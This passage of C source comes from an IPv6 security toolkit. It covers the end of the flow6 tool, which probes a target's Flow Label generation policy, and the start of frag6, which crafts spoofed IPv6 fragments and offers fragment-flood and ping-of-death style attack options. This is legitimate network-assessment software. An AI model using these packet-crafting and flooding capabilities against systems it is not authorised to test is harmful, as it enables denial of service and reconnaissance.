exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(idata.verbose_f){ print_attack_info(); } if(!idata.dstaddr_f){ puts("Error: Nothing to send! (Destination Address left unspecified)"); exit(EXIT_FAILURE); } /* Assess the Flow ID generation policy */ if(flowidp_f){ if(dstport_f && !protocol_f){ puts("Error: Must specify a protocol if the port number is specified"); exit(EXIT_FAILURE); } if(!protocol_f){ protocol= IPPROTO_TCP; dstport= 80; } else if(!dstport_f){ if(protocol == IPPROTO_TCP) dstport= 80; else dstport= 53; } puts("Identifying the 'Flow ID' generation policy of the target node...."); if(protocol == IPPROTO_TCP){ tcpwin= ((uint16_t) random() + 1500) & (uint16_t)0x7f00; tcpseq= random(); baseport= 50000+ random()%10000; lastport= baseport; } /* Set filter for receiving Neighbor Solicitations, and TCP segments */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_NSTCP_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); lastfrag1=0; ntest1=0; ntest2=0; testtype= FIXED_ORIGIN; if(srcprefix_f){ randprefix= idata.srcaddr; randpreflen=srcpreflen; } else{ randprefix= idata.srcaddr; randpreflen=64; sanitize_ipv6_prefix(&randprefix, randpreflen); } while(1){ curtime=time(NULL); if( testtype==FIXED_ORIGIN && ((curtime - start) >= ID_ASSESS_TIMEOUT || ntest1 >= NSAMPLES)){ testtype= MULTI_ORIGIN; addr_sig= random(); addr_key= random(); start= curtime; continue; } else if( testtype==MULTI_ORIGIN && ((curtime - start) >= ID_ASSESS_TIMEOUT || ntest2 >= NSAMPLES)){ break; } if((curtime - lastfrag1) >= 1){ if(testtype == FIXED_ORIGIN){ for(i=0; i>16) ^ addr_key)); if(send_neighbor_solicit(&idata, &(idata.dstaddr)) == -1){ puts("Error while sending Neighbor Solicitation"); exit(EXIT_FAILURE); } if(send_fid_probe() == -1){ puts("Error while sending packet"); exit(EXIT_FAILURE); } lastport++; } } lastfrag1=curtime; continue; } rset= sset; #if !defined(sun) && !defined(__sun) timeout.tv_usec=0; timeout.tv_sec= 1; #else timeout.tv_usec=10000; timeout.tv_sec= 0; #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } #if defined(sun) || defined(__sun) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif /* Read a packet (Echo Reply, or Neighbor Solicitation) */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6 && pkt_icmp6->icmp6_type == ND_NEIGHBOR_SOLICIT){ pkt_ns= (struct nd_neighbor_solicit *) pkt_icmp6; if( (pkt_end - (unsigned char *) pkt_ns) < sizeof(struct nd_neighbor_solicit)) continue; /* If the addresses that we're using are not actually configured on the local system (i.e., they are "spoofed", we must check whether it is a Neighbor Solicitation for one of our addresses, and respond with a Neighbor Advertisement. Otherwise, the kernel will take care of that. */ if(testtype==FIXED_ORIGIN){ if(!localaddr_f && is_eq_in6_addr(&(pkt_ns->nd_ns_target), &(idata.srcaddr))){ if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(idata.type == DLT_EN10MB && !(idata.flags & IFACE_LOOPBACK)){ if( (ntohl(pkt_ns->nd_ns_target.s6_addr32[2]) & 0x0000ffff) != addr_sig || \ (ntohl(pkt_ns->nd_ns_target.s6_addr32[3]) & 0x0000ffff) != ( (ntohl(pkt_ns->nd_ns_target.s6_addr32[3])>>16) ^ addr_key)){ continue; } if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } else if(pkt_ipv6->ip6_nxt == protocol){ /* Perform TCP-specific validation checks */ if(protocol == IPPROTO_TCP){ if( (pkt_end - (unsigned char *) pkt_ipv6) < \ (sizeof(struct ip6_hdr) + sizeof(struct tcp_hdr))) continue; pkt_tcp= (struct tcp_hdr *) ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)); /* * The TCP Destination Port must correspond to one of the ports that we have used as * TCP Source Port */ if(ntohs(pkt_tcp->th_dport) < baseport || ntohs(pkt_tcp->th_dport) > lastport) continue; /* The Source Port must be that to which we're sending our TCP segments */ if(ntohs(pkt_tcp->th_sport) != dstport) continue; /* The TCP Acknowledgement Number must ack our SYN */ if(ntohl(pkt_tcp->th_ack) != tcpseq+1) continue; /* We sample Flow ID's only on SYN/ACKs */ if( (pkt_tcp->th_flags & ~TH_SYN) == 0 || (pkt_tcp->th_flags & TH_ACK) == 0) continue; /* The TCP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; } /* Perform UDP-specific validation checks */ else if(protocol == IPPROTO_UDP){ if( (pkt_end - (unsigned char *) pkt_ipv6) < \ (sizeof(struct ip6_hdr) + sizeof(struct udp_hdr))) continue; pkt_udp= (struct udp_hdr *) ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr)); /* * The UDP Destination Port must correspond to one of the ports that we have used as * the UDP Source Port */ if(ntohs(pkt_udp->uh_dport) < baseport || ntohs(pkt_udp->uh_dport) > lastport) continue; /* The Source Port must be that to which we're sending our UDP datagrams */ if(ntohs(pkt_udp->uh_sport) != dstport) continue; /* The UDP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_udp, pkt_end-((unsigned char *)pkt_udp), IPPROTO_UDP) != 0) continue; } if(testtype==FIXED_ORIGIN){ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } if(ntest1 >= NSAMPLES) continue; test1[ntest1]= ntohl(pkt_ipv6->ip6_flow) & 0x000fffff; ntest1++; } else{ if( (ntohl(pkt_ipv6->ip6_dst.s6_addr32[2]) & 0x0000ffff) != addr_sig || \ (ntohl(pkt_ipv6->ip6_dst.s6_addr32[3]) & 0x0000ffff) != ( (ntohl(pkt_ipv6->ip6_dst.s6_addr32[3])>>16) ^ addr_key)){ continue; } if(ntest2 >= NSAMPLES) continue; test2[ntest2]= ntohl(pkt_ipv6->ip6_flow) & 0x000fffff; ntest2++; } } } } } if(idata.verbose_f > 1){ printf("Sampled %u Flow Labels from single-origin probes\n", ntest1); for(i=0; iether_type = htons(ETHERTYPE_IPV6); if( !(idata.flags & IFACE_LOOPBACK)){ ethernet->src = idata.hsrcaddr; ethernet->dst = idata.hdstaddr; } } else if(idata.type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata.srcaddr; ipv6->ip6_dst= idata.dstaddr; ipv6->ip6_nxt= protocol; if(protocol == IPPROTO_TCP){ tcp= (struct tcp_hdr *) ( (unsigned char *) ipv6 + sizeof(struct ip6_hdr)); ptr= (unsigned char *) tcp + sizeof(struct tcp_hdr); memset(tcp, 0, sizeof(struct tcp_hdr)); tcp->th_sport= htons(lastport); tcp->th_dport= htons(dstport); tcp->th_seq = htonl(tcpseq); tcp->th_ack= htonl(0); tcp->th_flags= TH_SYN;; tcp->th_urp= htons(0); tcp->th_win= htons(tcpwin); tcp->th_off= sizeof(struct tcp_hdr) >> 2; ipv6->ip6_plen= htons(ptr - (unsigned char *) tcp); tcp->th_sum = in_chksum(ipv6, tcp, (ptr - (unsigned char *) tcp), IPPROTO_TCP); } else{ udp= (struct udp_hdr *) ( (unsigned char *) ipv6 + sizeof(struct ip6_hdr)); ptr= (unsigned char *) udp + sizeof(struct udp_hdr); memset(udp, 0, sizeof(struct udp_hdr)); udp->uh_sport= htons(lastport); udp->uh_dport= htons(dstport); ipv6->ip6_plen= htons(ptr - (unsigned char *) udp); udp->uh_sum = in_chksum(ipv6, udp, (ptr - (unsigned char *) udp), IPPROTO_TCP); } if((nw=pcap_inject(idata.pfd, buffer, ptr - buffer)) == -1){ if(idata.verbose_f) printf("pcap_inject(): %s\n", pcap_geterr(idata.pfd)); return(-1); } if(nw != (ptr- buffer)){ if(idata.verbose_f) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return(0); } /* * Function: usage() * * Prints the syntax of the flow6 tool */ void usage(void){ puts("usage: flow6 -d DST_ADDR [-i INTERFACE] [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-A HOP_LIMIT] [-P PROTOCOL] [-p PORT]\n" " [-W] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the flow6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("flow6: Security assessment tool for the IPv6 Flow Label field\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --protocol, -P IPv6 Payload protocol (valid: TCP, UDP)\n" " --dst-port, -p Transport Protocol Destination Port\n" " --flow-label-policy, -W Assess the Flow Label generation policy\n" " --help, -h Print help for the flow6 tool\n" " --verbose, -v Be verbose\n" "\n" "Programmed by Fernando Gont on behalf of SI6 Networks \n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(void){ if(ether_ntop(&(idata.hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, (!idata.hsrcaddr_f)?" (automatically selected)":""); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(ether_ntop(&(idata.hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, (!idata.hdstaddr_f)?" (automatically selected)":""); if(inet_ntop(AF_INET6, &(idata.srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(idata.dstaddr_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata.srcaddr_f)?" (automatically selected)":"")); } if(inet_ntop(AF_INET6, &(idata.dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); printf("Protocol: %s\tDestination Port: %u\n", (protocol==IPPROTO_TCP)?"TCP":"UDP", dstport); } /* * Function: predict_flow_id() * * Identifies and prints the Flow Label generation policy */ int predict_flow_id(uint32_t *s1, unsigned int n1, uint32_t *s2, unsigned int n2){ uint32_t diff1_avg, diff2_avg; double diff1_sdev, diff2_sdev; if(inc_sdev(s1, n1, &diff1_avg, &diff1_sdev) == -1){ if(idata.verbose_f) puts("Error while allocating memory in inc_sdev()"); return(-1); } if(inc_sdev(s2, n2, &diff2_avg, &diff2_sdev) == -1){ if(idata.verbose_f) puts("Error while allocating memory in inc_sdev()"); return(-1); } if(diff1_sdev == 0 && diff1_avg == 0){ if(diff2_sdev == 0 && diff2_avg == 0){ printf("Flow Label policy: Global (predictable) constant labels, set to %05lu\n", (LUI) s1[0]); } else{ printf("Flow Label policy: Per-destination constant labels with increments of %lu (sdev: %f)\n", \ (LUI) diff2_avg, diff2_sdev); } } else if(diff1_sdev <= 100){ if(diff2_sdev <= 100){ printf("Flow Label policy: Global (predictable) labels with increments of %lu (sdev: %f)\n", \ (LUI) diff1_avg, diff1_sdev); } else{ printf("Flow Label policy: Per-destination labels with increments of %lu (sdev: %f)\n", \ (LUI) diff1_avg, diff1_sdev); printf(" Global policy: Avg. inc.: %lu, sdev: %f\n", (LUI) diff2_avg, diff2_sdev); } } else{ puts("Flow Label policy: Randomized labels"); printf(" Per-destination: Avg. inc.: %lu, sdev: %f\n" " Global: Avg. inc.: %lu, sdev: %f\n", \ (LUI) diff1_avg, diff1_sdev, (LUI) diff2_avg, diff2_sdev); } return(0); } ipv6toolkit-2.0+ds.1/tools/flow6.h000066400000000000000000000001131254360455000167530ustar00rootroot00000000000000/* * Header file for the flow6 tool * */ #define QUERY_TIMEOUT 65 ipv6toolkit-2.0+ds.1/tools/frag6.c000066400000000000000000002333161254360455000167330ustar00rootroot00000000000000/* * frag6: A security assessment tool that exploits potential flaws in the * processing of IPv6 fragments * * Copyright (C) 2011-2015 Fernando Gont (fgont@si6networks.com) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make frag6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "frag6.h" #include "ipv6toolkit.h" #include "libipv6.h" #define DEBUG /* Function prototypes */ int predict_frag_id(uint32_t *, unsigned int, uint32_t *, unsigned int); void print_attack_info(struct iface_data *); void print_help(void); void print_icmp6_echo(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_icmp6_timed(struct iface_data *, struct pcap_pkthdr *, const u_char *); void process_icmp6_echo(struct iface_data *, struct pcap_pkthdr *, const u_char *, unsigned char *, unsigned int *); void process_icmp6_timed(struct iface_data *, struct pcap_pkthdr *, const u_char *, unsigned char *); int send_fid_probe(struct iface_data *); int send_fragment(struct iface_data *, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int); int send_fragment2(struct iface_data *, uint16_t, unsigned int, unsigned int, unsigned int, unsigned int, char *); int test_frag_pattern(unsigned char *, unsigned int, char *); void usage(void); int valid_icmp6_response(struct iface_data *, struct pcap_pkthdr *, const u_char *); int valid_icmp6_response2(struct iface_data *, struct pcap_pkthdr *, const u_char *, unsigned int); /* Used for router discovery */ struct iface_data idata; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end, *pkt_ptr; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct ip6_frag *pkt_fh; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; struct dlt_null *dlt_null; struct nd_opt_tlla *tllaopt; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int frags, nfrags, nsleep; uint16_t mask, ip6length; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char verbose_f=0; unsigned char floodf_f=0; unsigned char loop_f=0, sleep_f=0, localaddr_f=0, tstamp_f=1, pod_f=0, gotresp_f= FALSE; unsigned char srcprefix_f=0, hoplimit_f=0, ip6length_f=0, icmp6psize_f=0; unsigned char fsize_f=0, forder_f=0, foffset_f=0, fid_f=0, fragp_f=0, fragidp_f=0, resp_f=1; uint32_t fsize, foffset, fid, id; unsigned int forder, overlap, minfragsize; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag *fh; struct ip6_hdr *fipv6; unsigned char *fragpart, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* Basic data blocks used for detecting the fragment reassembly policy. They contain the same words * in different order, thus resulting in the same checksum */ #define FRAG_BLOCK_SIZE 8 char block1[8]={'a', 'a', 'b', 'b', 'c', 'c', 'd', 'd'}; char block2[8]={'b', 'b', 'a', 'a', 'c', 'c', 'd', 'd'}; char block3[8]={'c', 'c', 'a', 'a', 'b', 'b', 'd', 'd'}; char block4[8]={'d', 'd', 'a', 'a', 'b', 'b', 'c', 'c'}; char block5[8]={'d', 'd', 'c', 'c', 'b', 'b', 'a', 'a'}; char block6[8]={'c', 'c', 'd', 'd', 'b', 'b', 'a', 'a'}; char block7[8]={'b', 'b', 'd', 'd', 'c', 'c', 'a', 'a'}; char block8[8]={'a', 'a', 'd', 'd', 'c', 'c', 'b', 'b'}; /* For the sampling of Fragment Identification values */ uint16_t addr_sig, addr_key; uint32_t icmp6_sig; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ fd_set sset, rset; struct timeval timeout; struct target_ipv6 targetipv6; int r, sel; time_t curtime, start, lastfrag=0, lastfrag1=0, lastfrag2=0; time_t lastfrag3=0, lastfrag4=0, lastfrag5=0; struct timeval curtimet, startt, lastfrag1t; unsigned int responses=0, maxsizedchunk; /* Array for storing the Fragment reassembly policy test results */ unsigned char test[5]; /* Arrays for storing the Fragment ID samples */ uint32_t test1[NSAMPLES], test2[NSAMPLES]; unsigned int ntest1=0, ntest2=0; unsigned char testtype; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-size", required_argument, 0, 'P'}, {"frag-type", required_argument, 0, 'O'}, {"frag-offset", required_argument, 0, 'o'}, {"frag-id", required_argument, 0, 'I'}, {"no-timestamp", no_argument, 0, 'T'}, {"no-responses", no_argument, 0, 'n'}, {"frag-reass-policy", no_argument, 0, 'p'}, {"frag-id-policy", no_argument, 0, 'W'}, {"pod-attack", no_argument, 0, 'X'}, {"flood-frags", required_argument, 0, 'F'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:S:D:s:d:A:u:U:H:P:O:o:I:TnpWXF:lz:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; init_iface_data(&idata); while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Fragment Size*/ fsize= atoi(optarg); fsize_f= 1; break; case 'O': /* Fragment Type */ if(strncmp(optarg, "first", MAX_STRING_SIZE) == 0){ forder= FIRST_FRAGMENT; forder_f=1; } else if(strncmp(optarg, "last", MAX_STRING_SIZE) == 0){ forder= LAST_FRAGMENT; forder_f=1; } else if(strncmp(optarg, "middle", MAX_STRING_SIZE) == 0){ forder= MIDDLE_FRAGMENT; forder_f=1; } else if(strncmp(optarg, "atomic", MAX_STRING_SIZE) == 0){ forder= ATOMIC_FRAGMENT; forder_f=1; } else{ puts("Unknown fragment order (valid order types: 'first', 'last', 'middle')"); exit(EXIT_FAILURE); } break; case 'o': /* Fragment Offset */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'Fragment Offset' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ foffset = ul_res; foffset_f=1; } break; case 'I': /* Fragment Identification */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'Fragment Identification' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ fid = ul_res; fid_f=1; } break; case 'T': /* Do not include timestamp in fragment */ tstamp_f=0; break; case 'n': /* Do not show responses */ resp_f=0; break; case 'p': /* Assess the fragment reassembly policy of the target */ fragp_f= 1; break; case 'W': /* Assess the fragment id generation policy of the target */ fragidp_f= 1; break; case 'F': /* Flood target with fragments */ nfrags= atoi(optarg); if(nfrags == 0){ puts("Invalid number of fragments in option -F"); exit(EXIT_FAILURE); } floodf_f= 1; break; case 'X': pod_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ verbose_f= idata.verbose_f; if(geteuid()) { puts("frag6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if((idata.ip6_local_flag && idata.ip6_global_flag) && !idata.srcaddr_f) localaddr_f=1; if(!sleep_f) nsleep=QUERY_TIMEOUT; idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; if(idata.verbose_f){ print_attack_info(&idata); } if(!idata.dstaddr_f){ puts("Error: Nothing to send! (Destination Address left unspecified)"); exit(EXIT_FAILURE); } if(!floodf_f) nfrags=1; if(!forder_f) forder= MIDDLE_FRAGMENT; /* Assess the Fragment Reassembly policy */ if(fragp_f){ puts("Identifying fragment reassembly policy of the target node...."); /* Set filter for receiving Neighbor Solicitations, ICMPv6 Echo Responses, and ICMPv6 Time Exceeded */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NSECHOEXCEEDED_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s\n", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s\n", pcap_geterr(idata.pfd)); 